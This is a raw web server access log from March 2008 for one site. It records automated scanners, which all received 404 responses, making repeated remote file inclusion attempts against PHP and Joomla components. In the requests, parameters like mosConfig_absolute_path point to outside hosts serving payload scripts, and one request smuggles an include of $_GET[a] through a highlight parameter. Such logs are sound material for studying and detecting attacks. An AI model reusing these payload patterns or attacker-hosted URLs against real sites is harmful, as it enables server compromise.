211.115.217.162 - - [23/Mar/2008:08:11:36 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.115.217.162 - - [23/Mar/2008:08:11:36 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:08:11:50 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:08:11:50 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:08:11:51 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:08:12:39 -0700] "GET /logs/access_080117.log//components/com_jreactions/langset.php?comPath=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:08:12:40 -0700] "GET //components/com_jreactions/langset.php?comPath=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:08:12:40 -0700] "GET /logs//components/com_jreactions/langset.php?comPath=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:08:12:58 -0700] "GET /logs/access_080101.log/sections/index.php?op=viewarticle&artid=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:08:13:28 -0700] "GET /logs/access_080225.log//index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:08:13:29 -0700] "GET //index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:08:13:29 -0700] "GET /logs//index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:13:34 -0700] "GET /logs/access_080120.log//protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:13:34 -0700] "GET //protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:13:34 -0700] "GET /logs//protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:13:38 -0700] "GET /logs/access_080120.log//protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:13:38 -0700] "GET //protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:13:38 -0700] "GET /logs//protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.172.175.102 - - [23/Mar/2008:08:13:38 -0700] "GET /logs/access_080131.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:08:13:57 -0700] "GET /logs/access_080223.log//classes/adodbt/errors.php?error=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.117.99 - - [23/Mar/2008:08:14:07 -0700] "GET //index.php?option=com_facileforms&Itemid=27&mosConfig_absolute_path=http://2007.cultuurmarathon.nl/site/components/com_web/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
80.249.117.99 - - [23/Mar/2008:08:14:07 -0700] "GET /logs//index.php?option=com_facileforms&Itemid=27&mosConfig_absolute_path=http://2007.cultuurmarathon.nl/site/components/com_web/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:08:14:35 -0700] "GET /logs/access.log//components/com_jreactions/langset.php?comPath=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:08:14:42 -0700] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:08:14:43 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:08:14:44 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.238.34 - - [23/Mar/2008:08:14:44 -0700] "GET /logs/access_080228.log//index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:14:55 -0700] "GET /logs/access_080201.log//claroline/tracking/userLog.php?rootSys=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:14:56 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:14:56 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:08:15:30 -0700] "GET /logs/access_080204.log//Neos_Chronos/header.php?base_folder=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:15:34 -0700] "GET /logs/access_080201.log//claroline/phpbb/page_tail.php?includePath=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:15:34 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:15:35 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:15:36 -0700] "GET /logs/access_080207.log//index.php?name=PNphpBB2&file=viewtopic&p=53//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.225.219.10 - - [23/Mar/2008:08:15:48 -0700] "GET /logs/access_080131.log/claroline/inc/claro_init_header.inc.php?includePath=http://www1.gars.at/wirtschaft/modules/poll/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [23/Mar/2008:08:15:48 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www1.gars.at/wirtschaft/modules/poll/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [23/Mar/2008:08:15:48 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www1.gars.at/wirtschaft/modules/poll/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:08:16:01 -0700] "GET /logs/access_080225.log//index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:08:16:02 -0700] "GET //index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [23/Mar/2008:08:16:02 -0700] "GET /logs/access_080215.log/claroline/inc/claro_init_header.inc.php?includePath=http://www1.gars.at/wirtschaft/modules/poll/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:08:16:02 -0700] "GET /logs//index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:16:04 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:16:04 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:16:04 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:16:04 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:16:04 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:16:04 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:16:05 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:16:05 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.192.116 - - [23/Mar/2008:08:16:05 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:16:42 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:16:42 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:16:42 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:16:48 -0700] "GET /logs/access_080122.log//index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.25.185.132 - - [23/Mar/2008:08:16:51 -0700] "GET /@rfihttp://autogg.it/images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:17:01 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:17:01 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:17:01 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.199.235.34 - - [23/Mar/2008:08:17:03 -0700] "GET /logs/access_080122.log//index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:17:08 -0700] "GET /logs/access_080225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.25.185.132 - - [23/Mar/2008:08:17:09 -0700] "GET /logs/@rfihttp://autogg.it/images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:17:09 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:17:09 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.208.75.240 - - [23/Mar/2008:08:17:28 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.75.240 - - [23/Mar/2008:08:17:29 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.75.240 - - [23/Mar/2008:08:17:29 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.75.240 - - [23/Mar/2008:08:17:31 -0700] "GET /logs/access_080122.log//index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.10.47.53 - - [23/Mar/2008:08:17:41 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.10.47.53 - - [23/Mar/2008:08:17:41 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.117.225.155 - - [23/Mar/2008:08:18:01 -0700] "GET /config.inc.php?_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
87.117.225.155 - - [23/Mar/2008:08:18:01 -0700] "GET /logs/config.inc.php?_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:08:18:08 -0700] "GET /logs/access_080117.log//components/com_jreactions/langset.php?comPath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:08:18:09 -0700] "GET //components/com_jreactions/langset.php?comPath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:08:18:10 -0700] "GET /logs//components/com_jreactions/langset.php?comPath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.9.138 - - [23/Mar/2008:08:18:20 -0700] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:08:18:24 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:18:25 -0700] "GET /logs/access_080215.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.winiker.net/public_html/oneadmin/_files/puki.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:08:18:28 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:08:18:28 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:08:18:29 -0700] "GET /logs/access_080223.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:08:18:31 -0700] "GET /logs/access_080122.log//index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
204.92.87.157 - - [23/Mar/2008:08:18:39 -0700] "GET //extras/ext_cats.php?dir_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.248.109.10 - - [23/Mar/2008:08:18:53 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.109.10 - - [23/Mar/2008:08:18:53 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.109.10 - - [23/Mar/2008:08:18:54 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.9.138 - - [23/Mar/2008:08:18:57 -0700] "GET /logs/access_080122.log//modules/Neos_Chronos/header.php?base_folder=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.9.138 - - [23/Mar/2008:08:18:57 -0700] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.9.138 - - [23/Mar/2008:08:18:58 -0700] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.255.3.68 - - [23/Mar/2008:08:19:02 -0700] "GET /logs/access_080228.log//index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.248.109.10 - - [23/Mar/2008:08:19:06 -0700] "GET /logs/access_080122.log//index.php?_REQUEST=&_REQUEST[option]=com_juser&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.9.138 - - [23/Mar/2008:08:19:27 -0700] "GET /logs/access_080204.log//modules/Neos_Chronos/header.php?base_folder=http://www.mediablackouts.com/wiki/db/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:08:19:40 -0700] "GET ///////plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:08:19:40 -0700] "GET /logs///////plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:08:19:41 -0700] "GET ///////plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.masterkkarate.com/joomla/rofile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:08:19:41 -0700] "GET /logs///////plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.masterkkarate.com/joomla/rofile.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:08:19:41 -0700] "GET ///////plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.masterkkarate.com/joomla/rotest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:08:19:41 -0700] "GET /logs///////plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.masterkkarate.com/joomla/rotest.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:08:19:43 -0700] "GET /mai.php?src=http://www.fiobera.unam.edu.ar/moodledata/cache/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
72.29.70.163 - - [23/Mar/2008:08:19:43 -0700] "GET /logs/mai.php?src=http://www.fiobera.unam.edu.ar/moodledata/cache/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
210.109.103.220 - - [23/Mar/2008:08:19:55 -0700] "GET /logs/access_080211.log/furum.php?furum=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.252.138.71 - - [23/Mar/2008:08:19:56 -0700] "GET /logs/access_080120.log//protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.109.103.220 - - [23/Mar/2008:08:19:56 -0700] "GET /furum.php?furum=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.252.138.71 - - [23/Mar/2008:08:19:56 -0700] "GET //protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.109.103.220 - - [23/Mar/2008:08:19:56 -0700] "GET /logs/furum.php?furum=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.252.138.71 - - [23/Mar/2008:08:19:57 -0700] "GET /logs//protection.php?action=logout&siteurl=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.151.245.1 - - [23/Mar/2008:08:19:59 -0700] "GET /logs/access_080126.log//modules/vwar/admin/admin.php?vwar_root=http://www.brunas2.t35.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
